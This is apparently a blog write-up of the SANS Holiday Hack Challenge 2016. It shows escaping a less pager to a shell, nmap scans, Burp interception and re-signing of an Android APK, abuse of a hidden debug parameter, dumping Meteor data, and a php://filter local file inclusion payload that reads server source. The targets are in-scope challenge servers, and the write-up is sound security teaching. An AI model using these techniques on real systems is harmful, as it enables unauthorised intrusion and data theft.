You are in room 6 of the cave, and have 100 arrows left. *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 1, 3, and 5. Move or shoot? (m-s) s 1 *thwock!* *groan* *crash* A horrible roar fills the cave, and you realize, with a smile, that you have slain the evil Wumpus and won the game! You don't want to tarry for long, however, because not only is the Wumpus famous, but the stench of dead Wumpus is also quite well known, a stench plenty enough to slay the mightiest adventurer at a single whiff!! Passphrase: WUMPUS IS MISUNDERSTOOD Care to play another game? (y-n)

And we have the password to the next room: WUMPUS IS MISUNDERSTOOD

Workshop Train Station - OUTATIME

When you first open the terminal you are presented with the following

Great lets start the train

==== MAIN MENU ==== STATUS: Train Status BRAKEON: Set Brakes BRAKEOFF: Release Brakes START: Start Train HELP: Open the help document QUIT: Exit console menu:main> START Checking brakes.... Brake must be off to start the train. ==== MAIN MENU ==== STATUS: Train Status BRAKEON: Set Brakes BRAKEOFF: Release Brakes START: Start Train HELP: Open the help document QUIT: Exit console menu:main> BRAKEOFF *******CAUTION******* The brake has been released! *******CAUTION******* off ==== MAIN MENU ==== STATUS: Train Status BRAKEON: Set Brakes BRAKEOFF: Release Brakes START: Start Train HELP: Open the help document QUIT: Exit console menu:main> START Checking brakes.... Enter Password:

Needs a password. Lets see if HELP gives us anything

**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level) **BRAKEON** option enables the brakes. Brakes should be enabled at every stop and whi le the train is not in use. **BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute. **START** option will start the train if the brake is released and the user has the co rrect password. **HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't. Just in case you wanted to know, here's a really good Cranberry pie recipe: Ingredients 1 recipe pastry for a 9 inch double crust pie 1 1/2 cups white sugar 1/3 cup all-purpose flour 1/4 teaspoon salt 1/2 cup water 1 (12 ounce) package fresh cranberries 1/4 cup lemon juice 1 dash ground cinnamon 2 teaspoons butter :

Looks like the help is being display in less, we can confirm this by pressing the ‘h’ key and getting the less help options.

SUMMARY OF LESS COMMANDS Commands marked with * may be preceded by a number, N. Notes in parentheses indicate the behavior if N is given. A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K. h H Display this help. q :q Q :Q ZZ Exit. ---------------------------------------------------------------------------

If we read through the help file something really interesting jumps out.

--------------------------------------------------------------------------- MISCELLANEOUS COMMANDS -<flag> Toggle a command line option [see OPTIONS below]. --<name> Toggle a command line option, by name. _<flag> Display the setting of a command line option. __<name> Display the setting of an option, by name. +cmd Execute the less cmd each time a new file is examined. !command Execute the shell command with $SHELL. We can run shell commands with the ! prefix.

Lets try opening an interactive shell with ! /bin/bash

! /bin/bash conductor@5d2c1d3606d6:~$ ls -ahtl total 40K drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 . drwxr-xr-x 6 root root 4.0K Dec 10 19:39 .. -rwxr-xr-x 1 root root 11K Dec 10 19:36 ActivateTrain -rw-r--r-- 1 root root 1.5K Dec 10 19:36 TrainHelper.txt -rwxr-xr-x 1 root root 1.6K Dec 10 19:36 Train_Console -rw-r--r-- 1 conductor conductor 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 conductor conductor 3.5K Nov 12 2014 .bashrc -rw-r--r-- 1 conductor conductor 675 Nov 12 2014 .profile conductor@5d2c1d3606d6:~$

Nice, ActivateTrain has the executable flag set. I wonder if its as simple as running this.

! ./ActivateTrain MONTH DAY YEAR HOUR MIN +-----+ +----+ +------+ O AM +----+ +----+ DISCONNECT CAPACITOR DRIVE | NOV | | 16 | | 1978 | | 10 |:| 21 | BEFORE OPENING +-----+ +----+ +------+ X PM +----+ +----+ +------------------------+ DESTINATION TIME | | +-----------------------------------------+ | +XX XX+ | +-----------------------------------------+ | |XXX XXX| | | +-+ XXX XXX +-+ | MONTH DAY YEAR HOUR MIN | XXX XXX | +-----+ +----+ +------+ X AM +----+ +----+ | XXXXX | | DEC | | 19 | | 2016 | | 08 |:| 45 | | XXX | +-----+ +----+ +------+ O PM +----+ +----+ | XXX | PRESENT TIME | XXX | +-----------------------------------------+ | SHIELD EYES FROM LIGHT | +-----------------------------------------+ | XXX | | XX+-+ | MONTH DAY YEAR HOUR MIN | | +-----+ +----+ +------+ O AM +----+ +----+ +------------------------+ | NOV | | 16 | | 1978 | | 10 |:| 21 | +---------+ +-----+ +----+ +------+ X PM +----+ +----+ |ACTIVATE!| LAST TIME DEPARTED +---------+ Press Enter to initiate time travel sequence.

Seems like this is the Back To The Future Train and its just sent us back to 1978

And if you travel up to the top of the North Pole, through the Wumpus door and in to the DFER room you will find where Santa Clause is being held.

We found Santa :) But he doesn’t know who kidnapped him.

I had managed to bypass the train application but i still wanted to know what the password was. So back to the console.

Running strings against the Train_Console application gives us the answer we were looking for.

conductor@5d2c1d3606d6:~$ strings Train_Console #!/bin/bash HOMEDIR="/home/conductor" CTRL="$HOMEDIR/" DOC="$HOMEDIR/TrainHelper.txt" PAGER="less" BRAKE="on" PASS="24fb3e89ce2aa0ea422c3d511d40dd84" print_header() { echo "" echo "Train Management Console: AUTHORIZED USERS ONLY"

Running the console again and using the password we found works as well.

Exploit Each of the Targets

We found Santa :) but our task is not yet complete. We need to know Who took Santa and Why.

Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?” Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”

Reading the full intro to question 7 it suggests that the APK file will hold some clues and any IP’s we find we must check they are in scope by asking Tom Hessman in game before starting any testing.

There are 6 items for us to retrieve audio files from.

The Mobile Analytics Server (Via credentialed login access) The Dungeon Game The Debug Server The Banner Ad Server The Uncaught Exception Handler Server The Mobile Analytics Server (Post Authentication)

First lets find all the targets. We know the APK holds clues and we already decompiled the source so lets have a look there.

thehermit@TECHANARCHY:~/Sans2016$ grep -r analytics SantaGram_4.2 SantaGram_4.2/res/values/strings.xml: <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string> SantaGram_4.2/res/values/strings.xml: <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string> SantaGram_4.2/res/values/public.xml: <public type="string" name="analytics_launch_url" id="0x7f070015" /> SantaGram_4.2/res/values/public.xml: <public type="string" name="analytics_usage_url" id="0x7f070016" />

dungeon returns another similar result a domain listed in res/values/strings.xml file. So lets take a closer look at that.

<xml version="1.0" encoding="utf-8"?> <resources> <string name="abc_action_bar_home_description">Navigate home</string> <string name="abc_action_bar_home_description_format">%1$s, %2$s</string> <string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string> <string name="abc_action_bar_up_description">Navigate up</string> <string name="abc_action_menu_overflow_description">More options</string> <string name="abc_action_mode_done">Done</string> <string name="abc_activity_chooser_view_see_all">See all</string> <string name="abc_activitychooserview_choose_application">Choose an app</string> <string name="abc_capital_off">OFF</string> <string name="abc_capital_on">ON</string> <string name="abc_search_hint">Search…</string> <string name="abc_searchview_description_clear">Clear query</string> <string name="abc_searchview_description_query">Search query</string> <string name="abc_searchview_description_search">Search</string> <string name="abc_searchview_description_submit">Submit query</string> <string name="abc_searchview_description_voice">Voice search</string> <string name="abc_shareactionprovider_share_with">Share with</string> <string name="abc_shareactionprovider_share_with_application">Share with %s</string> <string name="abc_toolbar_collapse_description">Collapse</string> <string name="status_bar_notification_info_overflow">999+</string> <string name="TAG">SantaGram</string> <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string> <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string> <string name="appVersion">4.2</string> <string name="app_name">SantaGram</string> <string name="appbar_scrolling_view_behavior">android.support.design.widget.AppBarLayout$ScrollingViewBehavior</string> <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string> <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string> <string name="character_counter_pattern">%1$d / %2$d</string> <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string> <string name="debug_data_enabled">true</string> <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string> <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string> <string name="title_activity_comments">Comments</string> </resources>

There are our domains, lets get the IP’s so we can check whats in scope with a quick nslookup

analytics.northpolewonderland.com - 104.198.252.157

dungeon.northpolewonderland.com - 35.184.47.139

dev.northpolewonderland.com - 35.184.63.245

ex.northpolewonderland.com - 104.154.196.33

ads.northpolewonderland.com - 104.198.221.240

Tom Confirms these are all in score and suggest that dirbuster is not going to help me

With the scope confirmed lets spin up a Kali box and get started.

analytics.northpolewonderland.com (Via Credentialed Logon)

Lets go have a look at the site.

As was suggested this needs a valid logon. We found a logon inside the apk earlier. lets try that.

Username = Guest, Password = busyreindeer78 and we are logged in successfully, more than that right at the top of the menu bar is a link to download an MP3. Click the link and we get clip number 2 discombobulatedaudio2.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio2.mp3

Visiting the dungeons main page is not as revealing as the last pages were.

It looks like a game and an elf in the game will trade for secrets! Looks like we need to beat the game and talk to the elf. But where is the game?

Lets spin up nmap and see what else is on this host. We run a basic namp scan against standard TCP ports.

. . . Snip . . . PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA) | 2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA) |_ 256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA) 80/tcp open http nginx 1.6.2 | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.6.2 |_http-title: About Dungeon 11111/tcp open vce? . . . Snip . . .

An open port on 11111, spidey sense is tingling, lets point netcat at that port and see what we get.

root@kali:~# nc dungeon.northpolewonderland.com 11111 Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >

Fun an old school MUD. Unlike the wumpus i don’t think we can bypass this with command line options. trying basic escape options doesn’t seem to reveal any obvious flaws either.

>! /bin/bash An interesting idea, but... Not a prayer. >

Pepper Minstix An Elf in the North Pole also gave us a link to an old version of the dungeon game. http://www.northpolewonderland.com/dungeon.zip Its probably useful to test this game rather than the online version for now.

With the game downloaded there are two files. dungeon and dtextc.dat. Running the dungeon file gives us the same output as the netcat connection so we are in the right place. Lets start simple with strings.

There are some interesting strings in there but nothing that looks like what we are looking for. From these strings we can identify the game as Zork or at least a derivative of it. And this game is not small. The map shows many rooms and many challenges before reaching the end. Looks like I’m going to have to cheat.

There were some interesting commands in the binary that are not mentioned in the online help lets see if we can get to some of these.

Valid commands are: AA- Alter ADVS DR- Display ROOMS AC- Alter CEVENT DS- Display state AF- Alter FINDEX DT- Display text AH- Alter HERE DV- Display VILLS AN- Alter switches DX- Display EXITS AO- Alter OBJCTS DZ- Display PUZZLE AR- Alter ROOMS D2- Display ROOM2 AV- Alter VILLS EX- Exit AX- Alter EXITS HE- Type this message AZ- Alter PUZZLE NC- No cyclops DA- Display ADVS ND- No deaths DC- Display CEVENT NR- No robber DF- Display FINDEX NT- No troll DH- Display HACKS PD- Program detail DL- Display lengths RC- Restore cyclops DM- Display RTEXT RD- Restore deaths DN- Display switches RR- Restore robber DO- Display OBJCTS RT- Restore troll DP- Display parser TK- Take No robber. No troll. No cyclops. No deaths. Restored robber. Restored troll. Restored cyclops. Restored deaths. Taken.

After playing around in the game for a while trying a few things i decided to take a more systematic approach and use ltrace to see whats happening as the game is played.

root@kali:~/Desktop/dungeon# ltrace ./dungeon __libc_start_main(0x4060a3, 1, 0x7fff14c5c378, 0x419570 <unfinished ...> getenv("TERM") = "xterm-256color" tgetent(0x7fff14c5b9f0, 0x7fff14c5edbf, 0x7fff14c5edbf, 12) = 1 tgetnum(0x41e088, 42, 0, 0) = 24 getuid() = 0 fopen("dtextc.dat", "r") = 0x19e62c0 _IO_getc(0x19e62c0) = '\0' _IO_getc(0x19e62c0) = '\002' _IO_getc(0x19e62c0) = '\0' _IO_getc(0x19e62c0) = '\a' _IO_getc(0x19e62c0) = '\0' _IO_getc(0x19e62c0) = 'H' _IO_getc(0x19e62c0) = '\002' _IO_getc(0x19e62c0) = 'I' . . . _IO_getc(0x19e62c0) = '^' _IO_getc(0x19e62c0) = '\332' _IO_getc(0x19e62c0) = 'S' _IO_getc(0x19e62c0) = '\332' _IO_getc(0x19e62c0) = 'F' _IO_getc(0x19e62c0) = '\332' _IO_getc(0x19e62c0) = 'A' ftell(0x19e62c0, 65, 0xffffffff, 0x7f7a5e7465c0) = 9063 time(0x7fff14c5c1f0) = 1481834271 localtime(0x7fff14c5c1f0) = 0x7f7a5ea084a0 chroot(0x41a524, 0, 51, 2016) = -1 perror("chroot"chroot: No such file or directory ) = <void> setuid(1000) = 0 setgid(1000) = -1 fseek(0x19e62c0, 9063, 0, 9063) = 0 _IO_getc(0x19e62c0) = '\036' putchar(87, 30, 73, 8192) = 87 _IO_getc(0x19e62c0) = '\005' putchar(101, 5, 97, 512) = 101 _IO_getc(0x19e62c0) = '\0' putchar(108, 0, 110, 0xfbad2a84) = 108 _IO_getc(0x19e62c0) = ',' . . . _IO_getc(0x19e62c0) = '}' putchar(45, 125, 97, 0xfbad2a84) = 45 _IO_getc(0x19e62c0) = 'k' putchar(55, 107, 110, 0xfbad2a84) = 55 _IO_getc(0x19e62c0) = 'G' putchar(56, 71, 76, 0xfbad2a84) = 56 _IO_getc(0x19e62c0) = '{' putchar(46, 123, 97, 0xfbad2a84) = 46 _IO_getc(0x19e62c0) = '[' putchar(10, 91, 110, 0xfbad2a84Welcome to Dungeon. This version created 11-MAR-78. ) = 10 fseek(0x19e62c0, 0x15237, 0, 0x15237) = 0 _IO_getc(0x19e62c0) = '\300' putchar(89, 192, 73, 0x15000) = 89 _IO_getc(0x19e62c0) = '\337' putchar(111, 223, 97, 0xfbad2a84) = 111 . . .

Lots more seeking and putting to screen

. . . _IO_getc(0x1da82c0) = '\226' putchar(101, 150, 121, 0xfbad2a84) = 101 _IO_getc(0x1da82c0) = '\225' putchar(114, 149, 108, 0xfbad2a84) = 114 _IO_getc(0x1da82c0) = '\206' putchar(101, 134, 111, 0xfbad2a84) = 101 _IO_getc(0x1da82c0) = '\321' putchar(46, 209, 114, 0xfbad2a84) = 46 _IO_getc(0x1da82c0) = '\304' putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here. ) = 10 putchar(62, 1, 0xe420, 1) = 62 fflush(0x7f1c38178600>) = 0 fgets(

Watching the dungeon run its opening the dat file and reading in all the chars, try to set a chroot jail, then it puts chars from the dat file on to the screen as text. It pauses at the end waiting for our input.

I try a simple command ‘look’

putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here. ) = 10 putchar(62, 1, 0xe420, 1) = 62 fflush(0x7f1c38178600>) = 0 fgets(look "look

", 78, 0x7f1c381778c0) = 0x625a84 __ctype_b_loc() = 0x7f1c385a76b0 toupper('l') = 'L' __ctype_b_loc() = 0x7f1c385a76b0 toupper('o') = 'O' __ctype_b_loc() = 0x7f1c385a76b0 toupper('o') = 'O' __ctype_b_loc() = 0x7f1c385a76b0 toupper('k') = 'K' strcmp("LOOK", "GDT") = 5 rand(6, 0, 0, 0) = 0x6b8b4567 fseek(0x1da82c0, 0x15237, 0, 0x15237) = 0 _IO_getc(0x1da82c0) = '\300' putchar(89, 192, 73, 0x15000) = 89

Now that’s interesting, it takes my input then converts it to uppercase and compares it against a string “GDT” before processing my actions. Lets see what happens if i give it GDT. I’m running this without ltrace for readability.

root@kali:~/Desktop/dungeon# ./dungeon chroot: No such file or directory Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >GDT GDT>help Valid commands are: AA- Alter ADVS DR- Display ROOMS AC- Alter CEVENT DS- Display state AF- Alter FINDEX DT- Display text AH- Alter HERE DV- Display VILLS AN- Alter switches DX- Display EXITS AO- Alter OBJCTS DZ- Display PUZZLE AR- Alter ROOMS D2- Display ROOM2 AV- Alter VILLS EX- Exit AX- Alter EXITS HE- Type this message AZ- Alter PUZZLE NC- No cyclops DA- Display ADVS ND- No deaths DC- Display CEVENT NR- No robber DF- Display FINDEX NT- No troll DH- Display HACKS PD- Program detail DL- Display lengths RC- Restore cyclops DM- Display RTEXT RD- Restore deaths DN- Display switches RR- Restore robber DO- Display OBJCTS RT- Restore troll DP- Display parser TK- Take GDT>

A hidden admin set of options. After playing around with some of the commands its apparent i don’t know enough about the game or its architecture to effectively cheat, however i can display the text that’s used in the game.

GDT>dt Entry: 1 Welcome to Dungeon. This version created 11-MAR-78. GDT>dt Entry: 2 Done. GDT>dt Entry: 3 Revision history: 11-NOV-16 Converted to HHC (V2.7HHC) 11-MAR-91 Converted to C (V2.7) 14-SEP-87 Converted to f77/Unix for pdps and Vaxen (V2.6B) 18-JUL-80 Transportable data base file (V2.5A). 28-FEB-80 Compressed text file (V2.4A). 15-NOV-79 Bug fixes (V2.3A). 18-JAN-79 Revised DECUS version (V2.2A). 10-OCT-78 Puzzle Room (V2.1A). 10-SEP-78 Endgame (V2.0A). 10-AUG-78 DECUS version (V1.1B). 14-JUN-78 Public version with parser (V1.1A). 4-MAR-78 Debugging version (V1.0A). GDT>

But only one at a time. Time to script something that will read out all the entries for me. I have been playing with pexpect a lot lately, a python library that can interact with command line tools.

import pexpect run_cmd = "./dungeon" # Start the process c = pexpect.spawn(run_cmd) # Look for an > c.expect(">") # send GDT c.sendline("GDT") # Wait for prompt to dsplay "GDT>" c.expect("GDT>", timeout=60) # Main loop for i in range(2000): #send "DT", wait for "Entry: " then send the next number in the loop c.sendline("DT") c.expect("Entry:") c.sendline(str(i)) c.expect("GDT>") # Print the output print c.before

What follows is a scrolling wall of text that prints out all the elements, at some point it will start typing blank lines and then random data, this is caused by trying to read elements that don’t exist. We can just stop this output and read back to find.

1022 The thief, who is essentially a pragmatist, dispatches you as a threat to his livelihood. 1023 The elf, willing to bargain, says "What's in it for me?" 1024 The elf, satisified with the trade says - Try the online version for the true prize 1025 "That wasn't quite what I had in mind", he says, tossing the # into the fire, where it vanishes. 1026 The elf appears increasingly impatient. 1027 The elf says - you have conquered this challenge - the game will now end. It worked we can see what the elf is programmed to say, so now its just a matter of running the script against the online version. We can do this by changing the run_cmd to: nc dungeon.northpolewonderland.com 11111 and running the script again. This time we get the answer we are looking for. Or at least the way to our answer. 1022 The thief, who is essentially a pragmatist, dispatches you as a threat to his livelihood. 1023 The elf, willing to bargain, says "What's in it for me?" 1024 The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek. 1025 "That wasn't quite what I had in mind", he says, tossing the # into the fire, where it vanishes.

A few minutes after sending the email we get a reply back.

And our next audio clip. discombobulatedaudio3.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio3.mp3

There doesn’t seem to be a lot going on here. nmap doesn’t show much in the way of open ports. and the web page is blank. Trying a handful of pages reveals nothing. Lets take a look at the app and see if we can figure out where it is used.

Grep for dev.northpole

root@kali:~/Sans2016$ grep -r dev.north SantaGram_4.2 SantaGram_4.2/res/values/strings.xml: <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>

grep for debug_data_collection

root@kali:~/Sans2016$ grep -r debug_data_collection SantaGram_4.2 SantaGram_4.2/res/values/strings.xml: <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string> SantaGram_4.2/res/values/public.xml: <public type="string" name="debug_data_collection_url" id="0x7f07001d" />

grep for 0x7f07001d

root@kali:~/Sans2016$ grep -r 0x7f07001d SantaGram_4.2 SantaGram_4.2/res/values/public.xml: <public type="string" name="debug_data_collection_url" id="0x7f07001d" /> SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile$1.smali: const v1, 0x7f07001d

OK after following the chain of variable names we end up on the edit profile page. But viewing this source code doesn’t show much.

We need to launch the app and intercept the traffic to try and understand whats going on here.

The simplest way is to run the app in a virtual environment. The two most popular methods are Android Studio or Genymotion.

To install GenyMotion follow the official guides for your operating system. Once you have GenyMotion installed open up burp and under Proxy -> Options configure burp to listen on all interfaces.

Then in the Android VM go in to wifi settings -> Modify Network and fill in the Proxy Settings for your burp machine.

Drag the apk in to the window and open it. When you first run you may notice that the app fails to logon or register accounts, this is due to burp using an non trusted certificate. And you can see the error under the alarms tab in burp. To fix this we need to export the certificate from burp and install it in the android vm.

Burp:

Under Proxy -> Options Export CA Certificate -> Export -> Certificate in DER Format Android

Drag the certificate file on to the VM window to copy it on to the OS Settings -> Security -> Install From SD Card Choose Internal Storage -> Downloads (SD Card will not see the file) Select the certificate file With the certificate installed we can now properly intercept all https traffic.

We see a lot of traffic flowing around but we are interested in the Edit Profile page which should somehow lead us to the dev domain.

From here i can change some of my profile settings like Name and Bio. The email address can also be changed if you add the parameters in to the request, but nothing about a dev sub domain.

Looking back in the apk source for all mention of debug we find an option to enable or disable debug mode which is currently set to false

root@kali:~/Sans2016$ grep -r debug SantaGram_4.2 SantaGram_4.2/res/values/strings.xml: <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string> SantaGram_4.2/res/values/strings.xml: <string name="debug_data_enabled">false</string>

Changing the xml file in the apk is not as simple as rezipping it. We need to recompile and sign the application.

Edit res/values/strings.xml and changing debug_data_enable to true.

Compile the APK

root@kali:~/Sans2016$ apktool b SantaGram_4.2 I: Using Apktool 2.2.1 I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... I: Building apk file... I: Copying unknown files/dir...

To sign the APK we need to generate a key then use the key on the APK. You may need to install jdk with ‘sudo apt-get install openjdk-9-jdk-headless’

To generate a key use the keytool application

root@kali:~/Sans2016$ keytool -genkey -v -keystore my-release-key.keystore -alias SantaGram -keyalg RSA -keysize 2048 -validity 10000 Enter keystore password: Re-enter new password: What is your first and last name? [Unknown]: Santa What is the name of your organizational unit? [Unknown]: Gram What is the name of your organization? [Unknown]: SantaGram What is the name of your City or Locality? [Unknown]: NorthPole What is the name of your State or Province? [Unknown]: North What is the two-letter country code for this unit? [Unknown]: NP Is CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP correct? [no]: Yes Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days for: CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP Enter key password for <SantaGram> (RETURN if same as keystore password): [Storing my-release-key.keystore]

Then sign it with jarsigner and our new key

root@kali:~/Sans2016$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore SantaGram_4.2/dist/SantaGram_4.2.apk SantaGram Enter Passphrase for keystore: adding: META-INF/MANIFEST.MF adding: META-INF/SANTAGRA.SF adding: META-INF/SANTAGRA.RSA signing: AndroidManifest.xml signing: assets/tou.html signing: classes.dex signing: res/anim-v21/design_bottom_sheet_slide_in.xml . . . SNIP . . . signing: res/raw/discombobulatedaudio1.mp3 signing: resources.arsc jar signed. Warning: The signer's certificate is self-signed. No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-10) or after any future revocation date.

If all goes well you should be able to drag the new apk from SantaGram_4.2/dist/ in to the VM and repeat the steps above to see the traffic to dev.northpolewonderland.com when opening the Edit Profile page.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

Great Now we know how to format the data we can start to play and see what we can get. From this point burp is a bit heavy and Chrome has a nice extension called POSTMan which is designed to quickly generate and view items like this.

We can see that sending the json string we get a response that includes our response and gives us a filename.

{"date":"20161223112641","status":"OK","filename":"debug-20161223112641-0.txt","request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":false}}

We can check to see if this is file exists https://dev.northpolewonderland.com/debug-20161223112641-0.txt It does exists and shows us the json object we sent.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

After playing with a few POSTS and comparing the outputs we can see that in our response there is a field named “verbose” which is set to false. Lets try setting this to true by adding it in to our POST.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504, "verbose": true}

And we get back a lot more information.

{"date":"20161223113154","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161223113154-0.txt","filename.len":26,"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":true},"files":["debug-20161223112121-0.txt","debug-20161223112359-0.txt","debug-20161223112506-0.txt","debug-20161223112527-0.txt","debug-20161223112641-0.txt","debug-20161223113154-0.txt","debug-20161224235959-0.mp3","index.php"]}

Which includes an mp3 file. http://dev.northpolewonderland.com/debug-20161224235959-0.mp3

https://techanarchy.net/assets/images/2016/12/debug-20161224235959-0.mp3

Looking at the sourcecode for the domain, after whitelisting the domain in your adblocker, we can see an interesting javascript tag

__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));

Pepper Minstix An Elf in the North Pole told us about a framework for exploiting sites that use the meteor framework.

Seems simple enough, Install TamperMonkey extension in your browser of choice. Then install the MeteorMiner script. Next time we load the ads page you should see the MeteorMiner interface load

As we navigate around the pages (routes) by clicking on the grey > we can see database entries (Collections) for pages even though we are not logged in.

Looking at the admin/quotes Route we can see a collection for HomeQuotes that contains an audio record

Meteor Miner shows us a lot but we need to use the javascript console in order to view Collection Contents.

In chrome Ctrl + Shift + i will open the console for you. From here we can use the meteor library itself to access data by typing HomeQuotes.find().fetch()

Another MP3 for our trouble.

http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio5.mp3

This is is similar in principal to the debug server in terms of our approach. from the XML file we recovered from the apk we know that there is a php page named exception.php and when we load this page in a browser we are told the Request method must be POST. Back to POSTMan

Create a POST to http://ex.northpolewonderland.com/exception.php and send it

Content type must be: application/json

Ok set a header Content-Type to application/json and send again

POST contains invalid JSON!

Fair one lets add a blank json object in the body and send again

Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

OK lets do as it says. {“operation”:”WriteCrashDump”}

Fatal error! JSON key 'data' must be set.

Keep doing as it says {“operation”:”WriteCrashDump”, “data”:”merryxmas”}

{ "success" : true, "folder" : "docs", "crashdump" : "crashdump-AMnahP.php" }

That looks better lets see whats on this page. It seems to have printed out whatever i put in the data field. From here i kind of tunnel visioned for a bit, believing there was a way to use this to execute code on the box.

We had another option for the operation at the beginning, ReadCrashDump. Lets see what this one does.

{“operation”:”ReadCrashDump”, “data”:”merryxmas”}

Fatal error! JSON key 'crashdump' must be set.

OK lets set that key assuming crashdump should reference an existing crashdump to read. {“operation”:”ReadCrashDump”, “data”:”merryxmas”, “crashdump”:”crashdump-AMnahP.php”}

Fatal error! JSON key 'crashdump' must be set.

Lets try putting crashdump in to data {“operation”:”ReadCrashDump”, “data”:{“crashdump”:”crashdump-AMnahP.php”}}

Fatal error! crashdump value duplicate '.php' extension detected.

and remove the extension {“operation”:”ReadCrashDump”, “data”:{“crashdump”:”crashdump-AMnahP”}}

“merryxmas”

Great we were able to read back the contents of the file from our original POST. I started going after some standard files like passwd shadow etc and i was getting nothing. I was trying to read the source for exception.php page when i remembered something I saw in the NorthPole. Sugarplum Mary was talking about PHP filters and local file inclusion attacks. She links to a blog post that’s probably going to help us.

Lets try reading the exception.php page again, remembering that it adds the .php extension on this is our new request.

{"operation":"ReadCrashDump", "data":{"crashdump": "php://filter/convert.base64-encode/resource=exception"}}

Success we are greeted with a chunk of base64 that decodes to the source code for exception.php

<?php # Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3 # Code from http://thisinterestsme.com/receiving-json-post-data-via-php/ # Make sure that it is a POST request. if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){ die("Request method must be POST

"); } # Make sure that the content type of the POST request has been set to application/json $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : ''; if(strcasecmp($contentType, 'application/json') != 0){ die("Content type must be: application/json

"); } # Grab the raw POST. Necessary for JSON in particular. $content = file_get_contents("php://input"); $obj = json_decode($content, true); # If json_decode failed, the JSON is invalid. if(!is_array($obj)){ die("POST contains invalid JSON!

